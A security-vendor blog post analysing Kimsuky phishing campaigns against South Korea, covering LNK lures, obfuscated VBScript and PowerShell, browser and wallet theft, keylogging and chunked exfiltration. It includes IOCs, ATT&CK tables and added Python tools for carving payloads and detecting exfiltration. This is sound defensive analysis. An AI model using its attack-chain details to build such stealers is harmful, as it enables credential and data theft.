    Defense Evasion | Masquerading | T1036 | Implant disguised as ZIP, decoy XLS used to simulate sanctioned logistics paperwork.
    Discovery | System Information Discovery | T1082 | Gathers hostname, computer name, domain; creates victim GUID to identify target.
    Discovery | Domain Trust Discovery | T1482 | Enumerates victim’s DNS domain for network profiling.
    Command & Control | Application Layer Protocol: HTTP | T1071.001 | Communicates with C2 via HTTP; uses MicrosoftAppStore/2001.0 User-Agent.
    Collection | Data from Local System | T1005 | Exfiltrates system details and file contents as per threat actor’s command triggers.
    Exfiltration | Exfiltration Over C2 Channel | T1041 | POST requests to /result endpoint on C2 with encoded command results or exfiltrated data.
    Impact | Data Exfiltration | T1537 | Targeted data theft from Russian aerospace sector.

    Authors:

    Subhajeet Singha

    Sathwik Ram Prakki




  • Kimsuky APT Targets South Korea with Deceptive PDF Lures

    Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics

    Contents

    • Introduction
    • Infection Chain
    • Initial Findings
    • Campaign 1
      • Looking into PDF document.
    • Campaign 2
      • Looking into PDF document.
    • Technical Analysis
    • Conclusion
    • Seqrite Protection
    • MITRE ATT&CK
    • IOCs

    Introduction:

    Security researchers at Seqrite Labs have recently uncovered two distinct campaigns carried out by the APT group “Kimsuky,” also known as “Black Banshee.” This group has been actively targeting South Korea using evolving tactics. In these campaigns, the threat actors delivered two South Korean government-themed documents as lures, specifically targeting government entities within South Korea.

    In this blog, we will delve into the technical details of the campaigns uncovered during our analysis. We will examine the various stages of infection, starting with a phishing email containing an LNK (shortcut) file attachment. The LNK file was designed to drop an obfuscated VBA (Visual Basic for Applications) script. After de-obfuscating the script, we found that it was responsible for dropping two additional files: one PDF file and one ZIP file. The ZIP file contained four malicious files: two log files (1.log and 2.log), one VBA script (1.vba), and one PowerShell script (1.ps1). Both campaigns involved the same set of malicious files.

    Infection Chain:

    Fig. 1 Infection chain

    Initial Findings:

    Campaign-1:

    In the first campaign, we identified a document about tax reduction and revenue-related tax payments, which carried the same malicious LNK attachment. This attachment subsequently deployed a malicious VBScript, facilitating further compromise.

    Fig. 2 Revanue.pdf file

    Based on our initial findings, we discovered that the adversary used a different document containing the same LNK file content.

    Campaign-2:

    In campaign-2, it came to our attention that South Korea has enacted a new policy aimed at preventing recidivism among sex offenders. The initiative involves circulating a detailed document outlining the regulations, which was shared with households, daycare centers, kindergartens, and various local administrative offices, including township and village authorities as well as neighbourhood community centres. Threat actors are exploiting this dissemination process by sending deceptive emails containing harmful attachments to residential recipients and key personnel at local offices.

    Fig. 3 Sex Offender Personal Information Notification.pdf

    The adversaries have exploited the distribution of this information by circulating the document via email under the filename 성범죄자 신상정보 고지.pdf.lnk (Sex Offender Personal Information Notification.pdf.lnk). The attachment is a malicious LNK file, which poses a threat to the recipients.

    Technical Analysis and Methodology:

    Campaign 1 & 2:

    We downloaded the file named 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1.lnk from campaign-1 and “성범죄자 신상정보 고지.pdf.lnk” (Sex Offender Personal Information Notification.pdf.lnk) from campaign-2, both of which were shared via email. During analysis, the LNK file appears to fetch additional files from an external C2 server, as shown in the snapshot below.

    Fig. 4 Downloading VBScript from C2 (Campaign-1)

    Fig. 5 Downloading VBScript from C2 (Campaign-2)

    The file was downloaded from the URL shown above and saved into the Temp folder, as indicated below.

    Fig. 6 Downloaded into Temp folder (Campaign-1)

    Fig. 7 Downloaded into Temp folder (Campaign-2)

    The file downloaded from the C2 server appears to be an obfuscated VBScript. Upon de-obfuscating the script, we discovered two additional files: one PDF and one ZIP file.

    Fig. 8 Obfuscated VBScript

    The first section of the file is a Base64-encoded string.

    Fig. 9 Base64-encoded PDF

    After decoding it, we found one PDF file.

    Fig. 10 PDF after decoding

    The second part of the VBScript is also Base64-encoded. After decoding it, we discovered a ZIP file.
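    A dropper that carries its payloads as two long Base64 strings (one decoding to a PDF decoy, one to a ZIP) can be triaged statically rather than by running it. As an added analyst example, not code from the Seqrite post, the Python below carves long Base64 runs out of a script, decodes them, and labels each blob by its magic bytes. The dropper text it runs on is constructed inline to mirror the layout described above (a decoy PDF and a ZIP holding 1.vbs, 1.ps1, 1.log and 2.log); the variable names and the file signatures table are the example's own assumptions.

```python
"""Added example (not from the Seqrite post): carve Base64 blobs out of a
dropper script and identify the decoded payloads by their magic bytes.
The sample script text is constructed here; it is not the real dropper."""
import base64
import binascii
import io
import re
import zipfile

# Well-known file signatures used to label decoded blobs.
MAGIC = {b"%PDF": "pdf", b"PK\x03\x04": "zip", b"MZ": "pe"}

# Long runs of Base64 alphabet; short runs are skipped so ordinary
# identifiers in the script text are not treated as payloads.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def identify(blob: bytes) -> str:
    """Return a label for the blob based on its leading magic bytes."""
    for magic, label in MAGIC.items():
        if blob.startswith(magic):
            return label
    return "unknown"


def carve_base64(script_text: str) -> list:
    """Decode every long Base64 run in the script; for ZIP payloads also
    list the member names so the analyst sees what the dropper carries."""
    payloads = []
    for m in B64_RUN.finditer(script_text):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue  # not valid Base64 (bad length/padding): skip
        entry = {"offset": m.start(), "label": identify(blob), "size": len(blob)}
        if entry["label"] == "zip":
            try:
                with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                    entry["names"] = zf.namelist()
            except zipfile.BadZipFile:
                entry["names"] = []
        payloads.append(entry)
    return payloads


def build_sample_script() -> str:
    """Constructed stand-in for the dropper: a decoy PDF followed by a ZIP
    of four placeholder files, both embedded as Base64 string literals."""
    pdf = (b"%PDF-1.4\n% constructed decoy document, not a real lure\n"
           b"1 0 obj << /Type /Catalog >> endobj\n%%EOF\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("1.vbs", "1.ps1", "1.log", "2.log"):
            zf.writestr(name, "placeholder content")
    pdf_b64 = base64.b64encode(pdf).decode()
    zip_b64 = base64.b64encode(buf.getvalue()).decode()
    return (
        "Dim pdfData, zipData\n"
        f'pdfData = "{pdf_b64}"\n'
        f'zipData = "{zip_b64}"\n'
        "' ... decode both strings and write them to %TEMP% ...\n"
    )


if __name__ == "__main__":
    for p in carve_base64(build_sample_script()):
        print(p)
```

    Any run of 64 or more Base64-alphabet characters whose length is a multiple of four also decodes (a 64-character hex SHA-256 is one example), so treat the "unknown" label as noise to filter rather than as a payload; the labelled PDF and ZIP entries are the ones worth extracting for a sandbox or a closer look.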

    Fig. 11 ZIP file

    Fig. 12 Detect It Easy

    The ZIP archive contains the files shown below.

    Fig. 13 Inside ZIP file

    Within the ZIP archive, four files were identified: a VBScript, a PowerShell script, and two Base64-encoded text files. These encoded text files hold obfuscated data which, upon further dissection, yields important details about the malware’s functionality and objectives. The following figures show the encoded content of the two text files, which are decoded and analysed below to reveal the next phase of the attack chain.

    Fig. 14 1.log file with Base64 encoding

    Fig. 15 2.log file with Base64 encoding

    The 1.vbs file employs obfuscation that uses the chr() and CLng() functions to construct characters dynamically and assemble the command at runtime, so the final command never appears in the file as plain text. This evades signature-based detection that matches on the literal command string.

    When the script finishes assembling the concatenated characters, the resulting command is executed. This command is likely designed to invoke the 1.ps1 PowerShell script, passing 1.log as an argument for further processing.
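    Because the characters are built from integer expressions, an analyst can rebuild the hidden strings without executing the script: evaluate each chr()/CLng() argument with a whitelisted arithmetic evaluator and merge the "&"-joined pieces. As an added example, not code from the Seqrite post, the Python below does that over a constructed VBScript fragment; the exact layout of the real 1.vbs (which expression forms it mixes, how it names variables) is an assumption, and the sample only reproduces the chr()/CLng() pattern described above.

```python
"""Added example (not the Seqrite post's code): statically rebuild strings that a
VBScript assembles from Chr()/Chr(CLng()) calls, without running the script.
The obfuscated sample below is constructed; the real 1.vbs layout is assumed."""
import ast
import operator
import re

# One character-producing call: Chr(<expr>) or Chr(CLng(<expr>)), where <expr>
# is an integer expression such as 112, 100+5, or &H63 (VBScript hex literal).
CHR_CALL = re.compile(r"Chr\(\s*(?:CLng\(\s*)?([^()]+?)\s*\)?\s*\)", re.IGNORECASE)

# Adjacent string literals joined with "&" (optionally across a "_" line continuation).
CONCAT = re.compile(r'"\s*&\s*(?:_\s*)?"')

_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod, ast.USub: operator.neg,
}


def vb_eval(expr: str) -> int:
    """Evaluate a VBScript integer expression with a whitelisted AST walk.
    Supports literals, &H hex, + - *, integer division '\\' and Mod; names and
    calls raise ValueError, so nothing from the script can execute here."""
    py = expr.strip().strip('"')
    py = re.sub(r"&H([0-9A-Fa-f]+)", r"0x\1", py)          # &H63 -> 0x63
    py = re.sub(r"\bMod\b", "%", py, flags=re.IGNORECASE)  # VB Mod -> %
    py = py.replace("\\", "//")                             # VB \ -> //
    tree = ast.parse(py, mode="eval")

    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported expression: {expr!r}")

    return int(walk(tree.body))


def recover_strings(vb_source: str) -> list:
    """Replace each Chr() call with its character, merge '&'-joined literals,
    and return every string literal that results, in source order."""
    literal_form = CHR_CALL.sub(lambda m: '"' + chr(vb_eval(m.group(1))) + '"', vb_source)
    merged = CONCAT.sub("", literal_form)
    return re.findall(r'"([^"]*)"', merged)


# Constructed fragment mixing the forms an obfuscator typically emits.
SAMPLE_VBS = (
    'Set sh = CreateObject(Chr(87) & Chr(CLng(83)) & Chr(CLng(&H63)) & Chr(114) & '
    'Chr(CLng(100+5)) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & '
    'Chr(101) & Chr(108) & Chr(108))\n'
    'cmd = Chr(49) & Chr(46) & Chr(CLng("&H70")) & Chr(CLng(230 \\ 2)) & Chr(49)\n'
)

if __name__ == "__main__":
    print(recover_strings(SAMPLE_VBS))
```

    The evaluator deliberately refuses anything that is not integer arithmetic, so a call such as CreateObject(...) inside a Chr() argument raises instead of running; that keeps the tool safe to point at untrusted scripts. Strings that the script builds in other ways (Mid(), StrReverse(), runtime string variables) are not recovered by this pass and still need manual follow-up.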

    Fig. 16 1.vbs

    De-obfuscating the VBScript reveals the following command line, which in turn triggers the PowerShell script for further processing.

    Fig. 17 De-obfuscated VBScript

    Executing the 1.vbs file triggers the invocation of 1.ps1, as illustrated in the snapshot below.

    Fig. 18 Executing 1.vbs

    The 1.ps1 script includes a function that decodes the Base64-encoded data in the 1.log file and executes the resulting script.

    Fig. 19 1.ps1 file

    Fig. 20 1.log after decoding

    The 1.ps1 script retrieves the BIOS serial number, a unique system identifier, from the compromised host. This serial number is used to create a dedicated directory within the system’s temporary folder, so that attack-related files are stored in a location specific to the compromised machine, as shown in the snapshot above.

    As a VM-aware sample, the script checks whether it is executing within a virtual machine environment. If it detects one, it deletes all four files associated with the attack (1.vbs, 1.ps1, 1.log, and any payload files stored in the directory named after the serial number), effectively halting its execution, as illustrated.

    The script contains 11 functions that define the subsequent phases of the malware’s operation, including data exfiltration, cryptocurrency wallet information theft, and the establishment of Command-and-Control (C2) communications. These functions are integral to the attack’s execution, facilitating the malware’s objectives and ensuring persistent communication with the threat actor.

    List of malicious functions retrieved from the 1.log file:

    1. UploadFile():

    The upload function exfiltrates data by transmitting it to the server in 1MB chunks, which lets it handle large files. Each chunk is sent via an HTTP POST request; the script waits for the server’s response and continues only if it receives HTTP status code 200. If the response differs, the script terminates. The function verifies the success of each upload iteration before sending the next chunk.
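    Fixed-size chunks, one POST per chunk and a stop on anything but 200 leave a recognisable shape in web-proxy logs: a run of equally sized successful POSTs from one client to one URL, usually ending in a shorter tail. As an added detection example, not code from the Seqrite post, the Python below parses a constructed proxy log and flags clients that send several consecutive 1 MiB POSTs to the same URL. The log field layout, the hostnames and the addresses are all constructed for the example, and 1 MiB is an assumption standing in for the post's "1MB".

```python
"""Added detection example (not from the Seqrite post): find chunked uploads in
HTTP proxy logs. The log format and every line below are constructed for this
example; a real proxy (Squid, Zscaler, ...) needs its own field mapping."""
import re
from dataclasses import dataclass

# Constructed format: <timestamp> <client> <method> <url> <status> <request-bytes>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) (?P<size>\d+)$"
)
MIB = 1024 * 1024


@dataclass
class Request:
    ts: str
    src: str
    method: str
    url: str
    status: int
    size: int


def parse_log(lines):
    """Parse constructed proxy lines; malformed lines are skipped."""
    reqs = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            reqs.append(Request(m["ts"], m["src"], m["method"], m["url"],
                                int(m["status"]), int(m["size"])))
    return reqs


def find_chunked_uploads(lines, chunk=MIB, slack=0.01, min_chunks=3):
    """Flag (client, url) pairs that send min_chunks or more successful POSTs of
    roughly `chunk` bytes in a row. A shorter final POST is counted as the tail
    of the file; any other request to the same pair ends the run. Runs for
    different pairs may interleave, since other browsing continues meanwhile."""
    alerts = []
    runs = {}  # (src, url) -> sizes of full-size chunks seen so far
    for r in parse_log(lines):
        key = (r.src, r.url)
        ok_post = r.method == "POST" and r.status == 200
        if ok_post and abs(r.size - chunk) <= chunk * slack:
            runs.setdefault(key, []).append(r.size)
            continue
        if key not in runs:
            continue
        sizes = runs.pop(key)
        tail = r.size if ok_post and r.size < chunk else 0  # short last chunk
        if len(sizes) >= min_chunks:
            alerts.append({"src": r.src, "url": r.url,
                           "chunks": len(sizes) + (1 if tail else 0),
                           "bytes": sum(sizes) + tail})
    for (src, url), sizes in runs.items():  # runs still open at end of log
        if len(sizes) >= min_chunks:
            alerts.append({"src": src, "url": url, "chunks": len(sizes), "bytes": sum(sizes)})
    return alerts


# Constructed sample: one client streams a ~4.25 MiB file in 1 MiB chunks, another
# sends a single large POST, a third is cut off by a non-200 after two chunks.
SAMPLE_LOG = [
    "2025-05-12T10:00:01Z 10.0.0.5 GET http://intranet.example/ 200 512",
    "2025-05-12T10:00:02Z 10.0.0.5 POST http://files.example/up 200 1048576",
    "2025-05-12T10:00:03Z 10.0.0.9 GET http://news.example/ 200 20480",
    "2025-05-12T10:00:04Z 10.0.0.5 POST http://files.example/up 200 1048576",
    "2025-05-12T10:00:05Z 10.0.0.7 POST http://files.example/up 200 1048576",
    "2025-05-12T10:00:06Z 10.0.0.5 POST http://files.example/up 200 1048576",
    "2025-05-12T10:00:07Z 10.0.0.5 POST http://files.example/up 200 1048576",
    "2025-05-12T10:00:08Z 10.0.0.7 POST http://files.example/up 200 1048576",
    "2025-05-12T10:00:09Z 10.0.0.5 POST http://files.example/up 200 262144",
    "2025-05-12T10:00:10Z 10.0.0.7 POST http://files.example/up 403 1048576",
    "2025-05-12T10:00:11Z 10.0.0.9 POST http://backup.example/api 200 1048576",
    "2025-05-12T10:00:12Z 10.0.0.9 POST http://backup.example/api 200 4096",
]

if __name__ == "__main__":
    for a in find_chunked_uploads(SAMPLE_LOG):
        print(a)
```

    Legitimate multipart uploaders (backup agents, cloud-storage sync clients) produce the same pattern, so this belongs behind an allowlist of known upload destinations; `chunk`, `slack` and `min_chunks` are the tuning knobs, and the 403 case in the sample shows why a non-200 closes the run without counting as a tail.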

    Fig. 21 UploadFile()

    2. GetExWFile():

    The GetExWFile function iterates through a set of predefined hash tables containing cryptocurrency wallet extensions. When a match is found, it identifies the associated “.ldb” and “.log” files linked to those extensions for exfiltration. These files are then copied to the destination folder specified by the $Storepath variable.

    Fig. 22 GetExWFile()

    3. GetBrowserData():

    The script checks whether any of the following browsers are running: Edge, Firefox, Chrome, or Naver Whale. It then extracts user profile data, including cookies, login credentials, bookmarks, and web data. Before collecting this information, the script terminates the browser processes to ensure uninterrupted access to the files. It then retrieves data on installed extensions and cache files, such as webcacheV01.dat, for each identified browser. For certain browsers, it also performs decryption operations to unlock the encrypted keys, allowing it to extract sensitive information, which is then stored alongside the decrypted master encryption key.

    Fig. 23 GetBrowserData()

    4. Download file():

    The Download file function downloads any file specified by a C2 command.

    Fig. 24 Download File()

    5. RegisterTask():

    It creates persistence for the files “1.log” and “1.vbs”.

    Fig. 25 RegisterTask()

    6. Send():

    The Send() function uploads all the collected information to the server after compressing the data into a ZIP file named “init.zip”. It then renames the ZIP file to “init.dat” and deletes all backup files from the system after uploading.

    Fig. 26 Send()

    The functions execute in a sequence in which several actions are carried out within the attack. One of them triggers another PowerShell command that calls the 2.log file, which is responsible for keylogging.

    Fig. 27 Flow of execution of functions and command to execute “2.log”

    Fig. 28 Executing 2.log file

    Fig. 29 Inside 2.log file

    The decoded content of the 2.log file is shown above. It contains a script that imports Windows API functions for detecting key presses, retrieving window titles, and managing keyboard state. The script performs clipboard monitoring, keystroke logging, and recording of window titles.

    Fig. 30.2 Code for clipboard monitoring

    Conclusion

    As observed, threat actors are utilizing time-consuming, multi-component techniques that are interlinked to enhance their evasiveness. Unlike other stealers, this one primarily focuses on network-related information, which could be leveraged for active reconnaissance. Given that the stealer targets sensitive user data, it is crucial to protect yourself with a reputable security solution such as Seqrite Antivirus in today’s digital landscape. At Seqrite Lab, we provide detection capabilities for such stealers at various stages of infection, along with protection against the latest threats.

    Seqrite Protection:

    • Trojan.49424.SL
    • Trojan.49422.C

    MITRE ATT&CK:

    Tactic | ID | Technique
    Initial Access | T1566.001 | Phishing: Spearphishing Attachment
    Execution | T1059.001 | Command and Scripting Interpreter: PowerShell
    Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic
    Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
    Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers
    Discovery | T1082 | System Information Discovery
    Collection | T1056.001 | Input Capture: Keylogging
    Command and Control | T1071.001 | Application Layer Protocol: Web Protocols
    Exfiltration | T1041 | Exfiltration Over C2 Channel

    IoCs:

    MD5 | File Name
    1119A977A925CA17B554DCED2CBABD8 | *.lnk
    64677CAE14A2EC4D393A81548417B61B | 1.log
    F0F63808E17994E91FD397E3A54A80CB | 2.log
    A3353EA094F45915408065D03AE157C4 | prevenue.hta
    CE4549607E46E656D8E019624D5036C1 | 1.vbs
    1B90EFF0B4F54DA72B19195489C3AF6C | *.lnk
    1D64508B384E928046887DD9CB32C2AC | 성범죄자 신상정보 고지.pdf.lnk

    C2

    • hxxps[:]//cdn[.]glitch[.]global/
    • hxxp[:]//srvdown[.]ddns.net

    Authors

    Dixit Panchal

    Kartik Jivani

    Soumen Burma